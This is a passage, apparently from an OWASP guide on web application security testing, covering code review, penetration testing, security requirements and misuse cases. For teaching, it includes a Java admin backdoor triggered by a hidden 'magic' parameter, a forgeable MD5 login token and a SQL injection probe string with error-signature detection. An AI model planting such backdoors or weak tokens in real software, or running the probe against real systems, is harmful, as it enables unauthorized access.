Source code review is the process of manually checking a web application's source code for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes, &amp;quot;if you want to know what’s really going on, go straight to the source.&amp;quot; Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes. Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient at finding implementation issues such as places where input validation was not performed or where fail-open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one that was analyzed [13].&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Completeness and effectiveness &lt;br /&gt;
* Accuracy &lt;br /&gt;
* Fast (for competent reviewers) &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Requires highly skilled security developers &lt;br /&gt;
* Can miss issues in compiled libraries &lt;br /&gt;
* Cannot detect run-time errors easily &lt;br /&gt;
* The source code actually deployed might differ from the one being analyzed&lt;br /&gt;
&lt;br /&gt;
'''For more on code review, check out the [[OWASP Code Review Project|OWASP code review project]]'''.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Penetration Testing ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application remotely, without knowing the inner workings of the application itself, to find security vulnerabilities. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system. While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but, again, with the nature of web applications their effectiveness is usually poor. Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, “If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem”. However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Can be fast (and therefore cheap) &lt;br /&gt;
* Requires a relatively lower skill-set than source code review &lt;br /&gt;
* Tests the code that is actually being exposed &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Too late in the SDLC &lt;br /&gt;
* Front impact testing only!&lt;br /&gt;
&lt;br /&gt;
=== The Need for a Balanced Approach ===&lt;br /&gt;
With so many techniques and so many approaches to testing the security of web applications, it can be difficult to understand which techniques to use and when to use them.&lt;br /&gt;
Experience shows that there is no right or wrong answer to exactly what techniques should be used to build a testing framework. The fact remains that all techniques should probably be used to ensure that all areas that need to be tested are tested. What is clear, however, is that there is no single technique that effectively covers all security testing that must be performed to ensure that all issues have been addressed. Many companies adopt one approach, which has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested, and is simply “too little too late” in the software development life cycle (SDLC). &lt;br /&gt;
The correct approach is a balanced one that includes several techniques, from manual interviews to technical testing. The balanced approach is sure to cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase. &lt;br /&gt;
Of course there are times and circumstances where only one technique is possible; for example, a test on a web application that has already been created, and where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, we encourage the testing parties to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. &lt;br /&gt;
A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. However, it is recommended that a balanced testing framework look something like the representations shown in Figure 3 and Figure 4. The following figure shows a typical proportional representation overlaid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionSDLC.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 3: Proportion of Test Effort in SDLC''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
The following figure shows a typical proportional representation overlaid onto testing techniques. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionTest.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 4: Proportion of Test Effort According to Test Technique''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''A Note about Web Application Scanners'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, we want to highlight some fundamental issues about why we do not believe that automating black box testing is (or will ever be) effective. By highlighting these issues, we are not discouraging web application scanner use. Rather, we are saying that their limitations should be understood, and testing frameworks should be planned appropriately.&lt;br /&gt;
NB: OWASP is currently working to develop a web application scanner-benchmarking platform. The following examples indicate why automated black box testing is not effective. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 1: Magic Parameters'''&amp;lt;br&amp;gt;&lt;br /&gt;
Imagine a simple web application that accepts a name-value pair of &amp;quot;magic&amp;quot; and then the value. For simplicity, the GET request may be: ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=value&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt; To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (31 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now:&amp;lt;br&amp;gt; ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt;&lt;br /&gt;
Given that all of the other parameters were simple two- and three-character fields, guessing a value of this length is not practical. A web application scanner would need to brute force (or guess) the entire key space: with 52 letters and 10 digits over 31 positions, that is 62^31 permutations, an astronomically large number of HTTP requests. That is an electron in a digital haystack! &lt;br /&gt;
The code for this exemplar Magic Parameter check may look like the following: &amp;lt;br&amp;gt;&lt;br /&gt;
 public void doPost( HttpServletRequest request, HttpServletResponse response) &lt;br /&gt;
 { &lt;br /&gt;
     String magic = &amp;quot;sf8g7sfjdsurtsdieerwqredsgnfg8d&amp;quot;; &lt;br /&gt;
     boolean admin = magic.equals( request.getParameter(&amp;quot;magic&amp;quot;)); &lt;br /&gt;
     if (admin) doAdmin( request, response); &lt;br /&gt;
     else ... // normal processing &lt;br /&gt;
 } &lt;br /&gt;
Looking at the code, a reviewer would see the vulnerability practically leap off the page as a potential problem. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 2: Bad Cryptography'''&amp;lt;br&amp;gt;&lt;br /&gt;
Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: ''Hash { username : date }'' &amp;lt;br&amp;gt;&lt;br /&gt;
When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP re-direct. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be. Clearly, once the scheme is explained, its inadequacies can be worked out, and anyone who figures it out (or is told how it works, or downloads the information from Bugtraq) can log in as any user. Manual inspection, such as an interview, would have uncovered this security issue quickly, as would inspection of the code. A black-box web application scanner would have seen only a 128-bit hash that changed with each user and, by the nature of hash functions, did not change in any predictable way.&lt;br /&gt;
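A minimal sketch of the flawed scheme, assuming hypothetical helper and class names, makes the weakness concrete: because the token is an unkeyed hash of public values, anyone who learns the recipe can mint a valid token for any user.&lt;br /&gt;

```java
import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;

// Hypothetical sketch of the scheme described above; names are illustrative.
// Site A computes MD5(username:date) -- and so can any attacker, because no
// secret key enters the computation.
public class WeakSsoToken {
    static String token(String username, String date) throws Exception {
        MessageDigest md5 = MessageDigest.getInstance("MD5");
        byte[] digest = md5.digest(
                (username + ":" + date).getBytes(StandardCharsets.UTF_8));
        return String.format("%032x", new BigInteger(1, digest)); // hex token
    }

    public static void main(String[] args) throws Exception {
        String issued = token("admin", "2009-06-04"); // site A's legitimate token
        String forged = token("admin", "2009-06-04"); // attacker's forgery, no secret needed
        System.out.println(issued.equals(forged));    // site B cannot tell them apart: true
    }
}
```

An interview or a code review exposes this immediately, while a keyed construction (for example, an HMAC over the same fields with a shared secret) would at least prevent offline forgery; this is exactly the kind of design flaw a black-box scanner cannot see.&lt;br /&gt;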
&amp;lt;br&amp;gt;&lt;br /&gt;
'''A Note about Static Source Code Review Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, we want to highlight some fundamental issues about why we do not believe this approach is effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design, since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors; however, significant manual effort is required to validate the findings. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Requirements Test Derivation==&lt;br /&gt;
If you want to have a successful testing program, you need to know what the objectives of the testing are. These objectives are specified by security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations and positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks.&lt;br /&gt;
&lt;br /&gt;
'''Testing Objectives'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the objectives of security testing is to validate that security controls function as expected. This is documented via ''security requirements'' that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service.  The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the [[OWASP Top Ten]], as well as vulnerabilities that were previously identified with security assessments during the SDLC, such as threat modeling, source code analysis, and penetration testing. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Documentation'''&amp;lt;br&amp;gt;&lt;br /&gt;
The first step in the documentation of security requirements is to understand the ''business requirements''. A business requirement document could provide the initial, high-level information about the expected functionality of the application. For example, the main purpose of an application may be to provide financial services to customers or to allow shopping for and purchasing of goods from an on-line catalogue. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies.&lt;br /&gt;
&lt;br /&gt;
A general checklist of the applicable regulations, standards, and policies serves well as a preliminary security compliance analysis for web applications. For example, compliance regulations can be identified by checking information about the business sector and the country/state where the application needs to operate. Some of these compliance guidelines and regulations might translate into specific technical requirements for security controls. For example, in the case of financial applications, compliance with the FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security controls and multi-factor authentication. &lt;br /&gt;
&lt;br /&gt;
Applicable industry security standards also need to be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, compliance with the PCI DSS standard [16] forbids the storage of PINs and CVV2 data, and requires that the merchant protect magnetic stripe data with encryption in storage and transmission, and by masking on display. Such PCI DSS security requirements could be validated via source code analysis.&lt;br /&gt;
&lt;br /&gt;
Another section of the checklist needs to enforce general requirements for compliance with the organization's information security standards and policies. From the functional requirements perspective, requirements for each security control need to map to a specific section of the information security standards. An example of such a requirement is: &amp;quot;a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.&amp;quot; When security requirements map to compliance rules, a security test can validate the exposure of compliance risks. If violations of information security standards and policies are found, they result in a risk that can be documented and that the business has to manage. Since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. &lt;br /&gt;
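A compliance requirement like the password complexity example above can be turned directly into an automatable check. The sketch below is illustrative: the interpretation of "six alphanumeric characters" as "at least six characters mixing letters and digits" is an assumption, and the function name is hypothetical.

```python
import re

def meets_password_policy(password: str) -> bool:
    """Hypothetical check for the example requirement: a minimum of six
    characters, containing both letters and digits."""
    if len(password) < 6:
        return False
    has_letter = re.search(r"[A-Za-z]", password) is not None
    has_digit = re.search(r"[0-9]", password) is not None
    return has_letter and has_digit
```

A security test can then assert a pass/fail outcome for each candidate password against this policy.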
&lt;br /&gt;
'''Security Requirements Validation'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the functionality perspective, the validation of security requirements is the main objective of security testing, while, from the risk management perspective, it is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as the lack of basic authentication, authorization, or encryption controls. In more depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in the security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personally identifiable information (PII) and sensitive data, the security requirement to be validated is compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization's encryption standards. These might require that only certain algorithms and key lengths be used. For example, a security requirement that can be security tested is verifying that only allowed algorithms are used (e.g., SHA-1, RSA, 3DES) with allowed minimum key lengths (e.g., more than 128 bits for symmetric and more than 1024 bits for asymmetric encryption).&lt;br /&gt;
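A configuration check of this kind can be sketched as an allowlist lookup. The algorithms and minimum key lengths below follow the example in the text and are illustrative assumptions, not recommendations.

```python
# Allowlist mapping algorithm name -> minimum key length in bits
# (exclusive, matching the "more than" wording of the example standard).
ALLOWED_ALGORITHMS = {
    "RSA": 1024,   # asymmetric
    "3DES": 128,   # symmetric
}

def is_compliant(algorithm: str, key_bits: int) -> bool:
    """An algorithm passes only if it is on the allowlist and its key
    length exceeds the required minimum."""
    min_bits = ALLOWED_ALGORITHMS.get(algorithm)
    return min_bits is not None and key_bits > min_bits
```

A security test against the deployed configuration would then fail the build for any algorithm outside the allowlist or any key at or below the minimum.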
&lt;br /&gt;
From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing/validation. &lt;br /&gt;
&lt;br /&gt;
Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from un-exploitable ones is possible when the results of penetration tests and source code analysis are combined. Considering the security test for a SQL injection vulnerability, for example, a black box test might first involve a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. Further validation of the SQL vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis until the malicious query is executed. Assuming the tester has the source code, she might learn from source code analysis how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to an unauthorized user).&lt;br /&gt;
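The first black box step described above, injecting a classic attack vector and looking for evidence of a SQL exception in the response, can be sketched as follows. The error signatures and the simulated application callable are illustrative assumptions.

```python
# Fragments of database error messages that commonly leak into responses.
SQL_ERROR_SIGNATURES = (
    "you have an error in your sql syntax",  # MySQL
    "unclosed quotation mark",               # SQL Server
    "ora-01756",                             # Oracle
)

def looks_like_sql_error(response_body: str) -> bool:
    body = response_body.lower()
    return any(sig in body for sig in SQL_ERROR_SIGNATURES)

def probe_field(send_request) -> bool:
    """send_request stands in for the application under test: it takes a
    field value and returns the response body. Inject a classic vector
    and report whether a SQL exception surfaced."""
    response = send_request("' OR '1'='1")
    return looks_like_sql_error(response)
```

A surfaced signature is only the fingerprint; as the text notes, confirming exploitability still requires manual refinement of the injected query.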
&lt;br /&gt;
'''Threats and Countermeasures Taxonomies'''&amp;lt;br&amp;gt;&lt;br /&gt;
A ''threat and countermeasure classification'' that takes into consideration the root causes of vulnerabilities is the critical factor in verifying that security controls are designed, coded, and built so that the impact due to the exposure of such vulnerabilities is mitigated. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point for deriving general security requirements. More specifically, the web application security frame [17] provides a classification (i.e., a taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root causes of the vulnerabilities. A threat can be categorized by using STRIDE [18], for example, as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as a security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of a weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.&lt;br /&gt;
&lt;br /&gt;
A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding, such as secure coding standards. An example of a common coding error in authentication controls consists of applying a hash function to a password without applying a salt (seed) to the value. From the secure coding perspective, this is a vulnerability that affects the protection used for authentication, with a root cause in a coding error. Since the root cause is insecure coding, the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC.&lt;br /&gt;
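The countermeasure for the coding error above can be sketched as hashing the password together with a per-user random salt rather than hashing the bare value. SHA-256 here stands in for whichever digest the coding standard mandates; a dedicated password hashing scheme (e.g., PBKDF2) would be preferable in practice.

```python
import hashlib
import os

def hash_password(password: str, salt: bytes = None):
    """Return (salt, digest). A fresh random salt is generated for each
    stored password when none is supplied."""
    if salt is None:
        salt = os.urandom(16)  # unique salt per stored password
    digest = hashlib.sha256(salt + password.encode("utf-8")).hexdigest()
    return salt, digest

def verify_password(password: str, salt: bytes, expected: str) -> bool:
    """Recompute the salted digest and compare against the stored value."""
    return hashlib.sha256(salt + password.encode("utf-8")).hexdigest() == expected
```

Because each stored password gets its own salt, two users with the same password produce different digests, which defeats precomputed dictionary attacks against the password store.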
&lt;br /&gt;
'''Security Testing and Risk Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security requirements need to take into consideration the severity of the vulnerabilities to support a ''risk mitigation strategy''. Assuming that the organization maintains a repository of vulnerabilities found in applications (i.e., a vulnerability knowledge base), the security issues can be reported by type, issue, mitigation, and root cause, and mapped to the applications where they are found. Such a vulnerability knowledge base can also be used to establish metrics to analyze the effectiveness of the security tests throughout the SDLC.&lt;br /&gt;
 &lt;br /&gt;
For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and an input validation vulnerability type. The exposure of such a vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before reaching the database, mitigating the vulnerability. By combining the results of source code analysis and penetration testing, it is possible to determine the likelihood and exposure of the vulnerability and calculate its risk rating. By reporting vulnerability risk ratings in the findings (e.g., the test report), it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk ones can be fixed in later releases.&lt;br /&gt;
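A toy version of this rating calculation combines the likelihood suggested by source code analysis with the exposure confirmed by penetration testing. The scale and thresholds are illustrative assumptions, not an OWASP-defined formula.

```python
LEVELS = {"low": 1, "medium": 2, "high": 3}

def risk_rating(likelihood: str, exposure: str) -> str:
    """Map likelihood x exposure onto a low/medium/high rating
    (assumed thresholds for illustration)."""
    score = LEVELS[likelihood] * LEVELS[exposure]
    if score >= 6:
        return "high"
    if score >= 3:
        return "medium"
    return "low"

def remediation_queue(findings):
    """Per the strategy above: high and medium risk findings are
    prioritized; low risk findings can wait for a later release."""
    return [f for f in findings
            if risk_rating(f["likelihood"], f["exposure"]) != "low"]
```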
&lt;br /&gt;
By considering the threat scenarios that exploit common vulnerabilities, it is possible to identify potential risks for which the application security controls need to be security tested. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identity theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization's vulnerability knowledge base can be used to derive security risk driven test cases to validate the most likely attack scenarios. For example, if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls.&lt;br /&gt;
&lt;br /&gt;
===Functional and Non Functional Test Requirements===&lt;br /&gt;
'''Functional Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the perspective of functional security requirements, the applicable standards, policies, and regulations drive both the need for a type of security control and the control's functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests.&lt;br /&gt;
Examples of positive requirements are: “the application will lock out the user after six failed logon attempts” or “passwords need to be a minimum of six alphanumeric characters”. The validation of positive requirements consists of asserting the expected functionality and, as such, can be done by re-creating the testing conditions, running the test with predefined inputs, and asserting the expected outcome as a pass/fail condition.&lt;br /&gt;
&lt;br /&gt;
In order to validate security requirements with security tests, security requirements need to be function driven and highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be:&lt;br /&gt;
*Protect user credentials and shared secrets in transit and in storage&lt;br /&gt;
*Mask any confidential data in display (e.g., passwords, accounts)&lt;br /&gt;
*Lock the user account after a certain number of failed login attempts &lt;br /&gt;
*Do not show specific validation errors to the user as a result of failed logon &lt;br /&gt;
*Only allow passwords that are alphanumeric, include special characters, and are a minimum of six characters in length, to limit the attack surface&lt;br /&gt;
*Allow password change functionality only for authenticated users, validating the old password, the new password, and the user's answer to the challenge question, to prevent brute forcing of a password via password change.&lt;br /&gt;
*The password reset form should validate the user’s username and the user’s registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question.&lt;br /&gt;
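One of the positive requirements above, locking the user account after a certain number of failed login attempts, can be asserted as a pass/fail unit test. The Authenticator class below is a minimal in-memory stand-in for the real control, with an assumed threshold of six attempts.

```python
class Authenticator:
    """Minimal stand-in for an authentication control with lockout."""
    MAX_FAILURES = 6  # assumed threshold, per the example requirement

    def __init__(self, username: str, password: str):
        self.username, self.password = username, password
        self.failures = 0
        self.locked = False

    def login(self, username: str, password: str) -> bool:
        if self.locked:
            return False  # a locked account rejects even correct credentials
        if username == self.username and password == self.password:
            self.failures = 0
            return True
        self.failures += 1
        if self.failures >= self.MAX_FAILURES:
            self.locked = True
        return False
```

A test then re-creates the condition (six wrong passwords) and asserts the outcome: the account is locked and even the correct password is rejected.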
&lt;br /&gt;
'''Risk Driven Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security tests also need to be risk driven, that is, they need to validate the application for unexpected behavior. These are also called “negative requirements”, since they specify what the application should not do. &lt;br /&gt;
Examples of &amp;quot;should not do&amp;quot; (negative) requirements are:&lt;br /&gt;
* The application should not allow for the data to be altered or destroyed&lt;br /&gt;
* The application should not be compromised or misused for unauthorized financial transactions by a malicious user.&lt;br /&gt;
&lt;br /&gt;
Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseeable input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling.&lt;br /&gt;
The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective:&lt;br /&gt;
*Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks&lt;br /&gt;
*Encrypt passwords using non reversible encryption such as using a digest (e.g., HASH) and a seed to prevent dictionary attacks&lt;br /&gt;
*Lock out accounts after reaching a logon failure threshold and enforce password complexity to mitigate risk of brute force password attacks&lt;br /&gt;
*Display generic error messages upon validation of credentials to mitigate risk of account harvesting/enumeration&lt;br /&gt;
*Mutually authenticate client and server to mitigate the risk of repudiation and Man-in-the-Middle (MiTM) attacks&lt;br /&gt;
&lt;br /&gt;
Threat modeling artifacts such as threat trees and attack libraries can be useful for deriving the negative test scenarios. A threat tree assumes a root attack (e.g., an attacker might be able to read other users' messages) and identifies different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and the necessary countermeasures (e.g., implement data validation and parameterized queries) that could be validated to be effective in mitigating such attacks.&lt;br /&gt;
&lt;br /&gt;
===Security Requirements Derivation Through Use and Misuse Cases===&lt;br /&gt;
A prerequisite to describing the application functionality is understanding what the application is supposed to do and how. This can be done by describing ''use cases''. Use cases, in the graphical form commonly used in software engineering, show the interactions of actors and their relations, and help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, and pre- and post-conditions. Similar to use cases, ''misuse and abuse cases'' [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well-defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker's point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which of them are the most critical and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated.&lt;br /&gt;
&lt;br /&gt;
To derive security requirements from use and misuse cases [20], it is important to define the functional scenarios and the negative scenarios, and to put these in graphical form. In the case of deriving security requirements for authentication, for example, the following step-by-step methodology can be followed.&lt;br /&gt;
&lt;br /&gt;
*Step 1: Describe the Functional Scenario: User authenticates by supplying username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails.&lt;br /&gt;
&lt;br /&gt;
*Step 2: Describe the Negative Scenario: An attacker breaks the authentication through a brute force/dictionary attack on passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information that lets an attacker determine which accounts are valid, registered accounts (usernames). The attacker then tries to brute force the password for such a valid account. A brute force attack against all-digit passwords of minimum length four can succeed within a limited number of attempts (i.e., 10^4).&lt;br /&gt;
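The arithmetic behind the negative scenario is simply the size of the password keyspace: an all-digit, four-character password has only 10^4 candidates, while a longer, mixed alphabet grows the space by many orders of magnitude. A small sketch:

```python
def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidate passwords an exhaustive attack must try."""
    return alphabet_size ** length

digits_only = keyspace(10, 4)            # the weak scenario: 10,000 candidates
mixed_alnum = keyspace(26 + 26 + 10, 7)  # upper + lower + digits, length 7
```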
&lt;br /&gt;
*Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (entering username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg]]&lt;br /&gt;
&lt;br /&gt;
*Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived: &lt;br /&gt;
:1) Passwords need to be alphanumeric, with lower and upper case, and a minimum of seven characters in length&lt;br /&gt;
:2) Accounts need to lock out after five unsuccessful login attempts&lt;br /&gt;
:3) Logon error messages need to be generic&lt;br /&gt;
These security requirements need to be documented and tested.&lt;br /&gt;
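Two of the derived requirements above can be sketched as testable checks. The function names and the generic error wording are illustrative assumptions.

```python
import re

def password_meets_requirements(pw: str) -> bool:
    """Requirement 1: alphanumeric, lower and upper case, minimum of
    seven characters."""
    return (len(pw) >= 7
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[0-9]", pw) is not None)

GENERIC_LOGON_ERROR = "Invalid username or password."  # assumed wording

def logon_error_message(failure_reason: str) -> str:
    """Requirement 3: return the same generic message regardless of
    whether the username or the password was wrong, so that error text
    cannot be used for account harvesting."""
    return GENERIC_LOGON_ERROR
```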
&lt;br /&gt;
===Security Tests Integrated in Developers' and Testers' Workflows===&lt;br /&gt;
'''Developers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that individual software components that they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executables. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected.  Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated. &lt;br /&gt;
The validation of source code before integration in application builds is usually the responsibility of the senior developer. This senior developer is also the subject matter expert in software security, and their role is to lead the secure code review and to decide whether to accept the code for release in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance, as well as by a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported in a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approval for checking the code changes into the application build.&lt;br /&gt;
&lt;br /&gt;
'''Testers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
